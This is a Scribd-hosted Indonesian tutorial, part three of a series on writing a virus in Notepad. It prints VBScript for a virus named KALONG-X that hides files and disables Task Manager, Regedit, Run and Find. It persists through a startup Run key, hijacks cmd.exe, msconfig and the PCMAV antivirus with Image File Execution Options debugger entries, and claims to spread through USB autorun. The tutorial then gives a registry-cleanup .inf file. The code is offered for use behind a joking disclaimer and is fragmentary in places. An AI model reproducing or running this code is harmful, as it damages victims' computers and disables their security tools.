Scribd Logo
Upload

Welcome to Scribd!

  • Membuat Virus Via Notepad (INI VIRUS GANAS)

    Uploaded by

    Ifolala Telaumbanua
    24 views3 pages

    Original Title

    membuat virus via notepad (INI VIRUS GANAS).doc

    Copyright

    © © All Rights Reserved

    Available Formats

    DOC, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    24 views3 pages

    Membuat Virus Via Notepad (INI VIRUS GANAS)

    Uploaded by

    Ifolala Telaumbanua

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    membuat virus via notepad (3)

    Membuat virus dengan notepad (3) Dibawah ini adalah lanjutan cara-cara membuat program dan virus via
    notepad

    ‘Ubah IE Title
    kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”::
    ->KALONG-X<- ::”
    ‘File Hidden tak terlihat
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hi
    dden”,2, “REG_DWORD”
    ‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″,
    “REG_DWORD”
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOpti
    ons”, “1″, “REG_DWORD”
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″,
    “REG_DWORD”
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistr
    yTools”, “1″, “REG_DWORD”
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskM
    gr”, “1″, “REG_DWORD”
    kalong.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewCont
    extMenu”, “1″, “REG_DWORD”
    ‘Buat pesan saat Windows Startup
    kalong.regwrite
    “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaptio
    n”, “THE KALONG-X”
    kalong.RegWrite
    “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”
    No reason for Panic” ‘Aktifkan saat Windows Startup
    kalong.regwrite
    “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath
    & “\batch- k4l0n6.dll.vbs”
    ‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
    kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
    ‘Bonus
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check <> 1
    set sd = createobject(”Wscript.shell”)
    sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
    Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu
    simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan
    KALONG-X.VBS di komputer Anda.
    Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe,
    RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka
    Notepad yang isinya kurang lebih mirip seperti ini : Ingat jadilah orang yang bermanfaat bagi orang lain.
    Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung
    jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan
    saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan
    Anda ditanggung oleh Anda sendiri.
    Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash
    Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
    NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama
    wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari
    tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah
    Command Prompt gak bisa.
    Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di
    WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options.
    Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
    [Version]
    Signature=”$Chicago$”
    Provider=Fariskhi [DefaultInstall]
    AddReg=UnhookRegKey
    DelReg=del [UnhookRegKey]
    HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER” [del]
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
    HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
    HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
    HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
    Options\RegistryEditor.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe,
    Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-
    CLN.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-
    RTP.exe, Debugger
    Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf.
    Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan
    Notepad.ini adalah tutorial milik teman aku tapi tenang aja da kurubah sintak programnya di di bagian
    regisry nya kaliii
    Anda boleh mencopy + paste tulisan-tulisan diatasdengan syarat mencantumkan
    narasumber:www.indocracker.wetpaint.com

    You might also like